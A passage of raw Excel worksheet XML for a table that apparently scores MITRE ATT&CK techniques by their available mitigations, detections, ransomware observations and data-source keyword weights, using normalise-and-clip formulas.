        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC438" s="29" t="s">
        <v>1643</v>
      </c>
      <c r="AD438" s="25" t="str" cm="1">
        <f t="array" ref="AD438">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC438)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE438" s="25">
        <f>IF(AD438="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF438" s="25" t="str" cm="1">
        <f t="array" ref="AF438">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC438)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG438" s="25">
        <f>IF(AF438="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH438" s="25" t="str" cm="1">
        <f t="array" ref="AH438">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC438)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI438" s="25">
        <f>IF(AH438="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ438" s="25" t="str" cm="1">
        <f t="array" ref="AJ438">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC438)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK438" s="25">
        <f>IF(AJ438="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL438" s="25" t="str" cm="1">
        <f t="array" ref="AL438">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC438)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM438" s="25">
        <f>IF(AL438="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN438" s="59">
        <v>1</v>
      </c>
      <c r="AO438" s="51">
        <v>1</v>
      </c>
      <c r="AP438" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6809523809523808E-2</v>
      </c>
      <c r="AQ438" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4920634920634923E-2</v>
      </c>
      <c r="AR438" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4920634920634923E-2</v>
      </c>
      <c r="AS438" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT438" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU43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39" spans="1:47" ht="32.1">
      <c r="A439" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.5833333333333335E-2</v>
      </c>
      <c r="B439" s="25">
        <f>SUM(H439,M439,V439)*(1+SUM(AE439,AG439,AI439,AK439,AM439))</f>
        <v>0.15833333333333335</v>
      </c>
      <c r="C439" s="25" t="s">
        <v>1644</v>
      </c>
      <c r="D439" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E439" s="25" t="s">
        <v>1645</v>
      </c>
      <c r="F439" s="51">
        <v>1</v>
      </c>
      <c r="G439" s="51">
        <v>1</v>
      </c>
      <c r="H439" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I439">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J439">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K439">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L439">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M439" s="25">
        <v>0</v>
      </c>
      <c r="N439" s="51">
        <v>0</v>
      </c>
      <c r="O439" s="51">
        <v>2</v>
      </c>
      <c r="P439" s="51">
        <v>1</v>
      </c>
      <c r="Q439" s="51">
        <v>1</v>
      </c>
      <c r="R439" s="51"/>
      <c r="S439" s="51">
        <v>0</v>
      </c>
      <c r="T439" s="51"/>
      <c r="U439" s="51">
        <v>0</v>
      </c>
      <c r="V439" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W439">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X439">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y439">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z439">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA439">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB439">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC439" s="29" t="s">
        <v>1646</v>
      </c>
      <c r="AD439" s="25" t="str" cm="1">
        <f t="array" ref="AD439">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC439)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE439" s="25">
        <f>IF(AD439="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF439" s="25" t="str" cm="1">
        <f t="array" ref="AF439">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC439)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG439" s="25">
        <f>IF(AF439="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH439" s="25" t="str" cm="1">
        <f t="array" ref="AH439">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC439)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI439" s="25">
        <f>IF(AH439="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ439" s="25" t="str" cm="1">
        <f t="array" ref="AJ439">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC439)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK439" s="25">
        <f>IF(AJ439="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL439" s="25" t="str" cm="1">
        <f t="array" ref="AL439">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC439)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM439" s="25">
        <f>IF(AL439="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN439" s="52">
        <v>0</v>
      </c>
      <c r="AO439" s="51">
        <v>0</v>
      </c>
      <c r="AP439" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.5833333333333335E-2</v>
      </c>
      <c r="AQ439" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.2777777777777785E-2</v>
      </c>
      <c r="AR439" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.2777777777777785E-2</v>
      </c>
      <c r="AS439" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT439" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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40" spans="1:47" ht="32.1">
      <c r="A440" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.5833333333333335E-2</v>
      </c>
      <c r="B440" s="25">
        <f>SUM(H440,M440,V440)*(1+SUM(AE440,AG440,AI440,AK440,AM440))</f>
        <v>0.15833333333333335</v>
      </c>
      <c r="C440" s="25" t="s">
        <v>1647</v>
      </c>
      <c r="D440" s="25" t="s">
        <v>175</v>
      </c>
      <c r="E440" s="25" t="s">
        <v>1648</v>
      </c>
      <c r="F440" s="51">
        <v>1</v>
      </c>
      <c r="G440" s="51">
        <v>1</v>
      </c>
      <c r="H440" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I440">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J440">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K440">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L440">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M440" s="25">
        <v>0</v>
      </c>
      <c r="N440" s="51">
        <v>1</v>
      </c>
      <c r="O440" s="51">
        <v>2</v>
      </c>
      <c r="P440" s="51">
        <v>0</v>
      </c>
      <c r="Q440" s="51">
        <v>1</v>
      </c>
      <c r="R440" s="51"/>
      <c r="S440" s="51">
        <v>0</v>
      </c>
      <c r="T440" s="51"/>
      <c r="U440" s="51">
        <v>0</v>
      </c>
      <c r="V440" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W440">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X440">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y440">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z440">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA440">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB440">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC440" s="29" t="s">
        <v>243</v>
      </c>
      <c r="AD440" s="25" t="str" cm="1">
        <f t="array" ref="AD440">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC440)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE440" s="25">
        <f>IF(AD440="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF440" s="25" t="str" cm="1">
        <f t="array" ref="AF440">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC440)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG440" s="25">
        <f>IF(AF440="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH440" s="25" t="str" cm="1">
        <f t="array" ref="AH440">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC440)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI440" s="25">
        <f>IF(AH440="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ440" s="25" t="str" cm="1">
        <f t="array" ref="AJ440">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC440)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK440" s="25">
        <f>IF(AJ440="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL440" s="25" t="str" cm="1">
        <f t="array" ref="AL440">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC440)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM440" s="25">
        <f>IF(AL440="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN440" s="60">
        <v>0</v>
      </c>
      <c r="AO440" s="51">
        <v>0</v>
      </c>
      <c r="AP440" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.5833333333333335E-2</v>
      </c>
      <c r="AQ440" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.2777777777777785E-2</v>
      </c>
      <c r="AR440" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.2777777777777785E-2</v>
      </c>
      <c r="AS440" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT440" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU44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41" spans="1:47">
      <c r="A441" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10690476190476191</v>
      </c>
      <c r="B441" s="25">
        <f>SUM(H441,M441,V441)*(1+SUM(AE441,AG441,AI441,AK441,AM441))</f>
        <v>6.9047619047619052E-2</v>
      </c>
      <c r="C441" s="25" t="s">
        <v>1649</v>
      </c>
      <c r="D441" s="25" t="s">
        <v>1650</v>
      </c>
      <c r="E441" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F441" s="51">
        <v>1</v>
      </c>
      <c r="G441" s="51">
        <v>0</v>
      </c>
      <c r="H441" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I441">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J441">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K441">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L441">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M441" s="25">
        <v>0</v>
      </c>
      <c r="N441" s="51">
        <v>0</v>
      </c>
      <c r="O441" s="51">
        <v>4</v>
      </c>
      <c r="P441" s="51">
        <v>0</v>
      </c>
      <c r="Q441" s="51">
        <v>0</v>
      </c>
      <c r="R441" s="51"/>
      <c r="S441" s="51">
        <v>0</v>
      </c>
      <c r="T441" s="51"/>
      <c r="U441" s="51">
        <v>0</v>
      </c>
      <c r="V441" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W441">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X441">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y441">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z441">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA441">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB441">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC441" s="29" t="s">
        <v>513</v>
      </c>
      <c r="AD441" s="25" t="str" cm="1">
        <f t="array" ref="AD441">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC441)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE441" s="25">
        <f>IF(AD441="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF441" s="25" t="str" cm="1">
        <f t="array" ref="AF441">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC441)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG441" s="25">
        <f>IF(AF441="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH441" s="25" t="str" cm="1">
        <f t="array" ref="AH441">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC441)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI441" s="25">
        <f>IF(AH441="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ441" s="25" t="str" cm="1">
        <f t="array" ref="AJ441">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC441)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK441" s="25">
        <f>IF(AJ441="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL441" s="25" t="str" cm="1">
        <f t="array" ref="AL441">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC441)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM441" s="25">
        <f>IF(AL441="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN441" s="60">
        <v>3</v>
      </c>
      <c r="AO441" s="51">
        <v>1</v>
      </c>
      <c r="AP441" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10690476190476191</v>
      </c>
      <c r="AQ441" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.3015873015873017E-2</v>
      </c>
      <c r="AR441" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.3015873015873017E-2</v>
      </c>
      <c r="AS441" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT441" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU44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42" spans="1:47">
      <c r="A442" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11293714285714286</v>
      </c>
      <c r="B442" s="25">
        <f>SUM(H442,M442,V442)*(1+SUM(AE442,AG442,AI442,AK442,AM442))</f>
        <v>0.12937142857142861</v>
      </c>
      <c r="C442" s="25" t="s">
        <v>1651</v>
      </c>
      <c r="D442" s="25" t="s">
        <v>148</v>
      </c>
      <c r="E442" s="25" t="s">
        <v>1652</v>
      </c>
      <c r="F442" s="51">
        <v>1</v>
      </c>
      <c r="G442" s="51">
        <v>1</v>
      </c>
      <c r="H442" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I442">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J442">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K442">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L442">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M442" s="25">
        <v>0</v>
      </c>
      <c r="N442" s="51">
        <v>0</v>
      </c>
      <c r="O442" s="51">
        <v>3</v>
      </c>
      <c r="P442" s="51">
        <v>0</v>
      </c>
      <c r="Q442" s="51">
        <v>0</v>
      </c>
      <c r="R442" s="51"/>
      <c r="S442" s="51">
        <v>0</v>
      </c>
      <c r="T442" s="51"/>
      <c r="U442" s="51">
        <v>0</v>
      </c>
      <c r="V442" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W442">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X442">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y442">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z442">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA442">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB442">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC442" s="29" t="s">
        <v>122</v>
      </c>
      <c r="AD442" s="25" t="str" cm="1">
        <f t="array" ref="AD442">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC442)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE442" s="25">
        <f>IF(AD442="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF442" s="25" t="str" cm="1">
        <f t="array" ref="AF442">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC442)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG442" s="25">
        <f>IF(AF442="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH442" s="25" t="str" cm="1">
        <f t="array" ref="AH442">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC442)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI442" s="25">
        <f>IF(AH442="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ442" s="25" t="str" cm="1">
        <f t="array" ref="AJ442">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC442)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK442" s="25">
        <f>IF(AJ442="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL442" s="25" t="str" cm="1">
        <f t="array" ref="AL442">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC442)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM442" s="25">
        <f>IF(AL442="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN442" s="59">
        <v>3</v>
      </c>
      <c r="AO442" s="51">
        <v>1</v>
      </c>
      <c r="AP442" s="25">
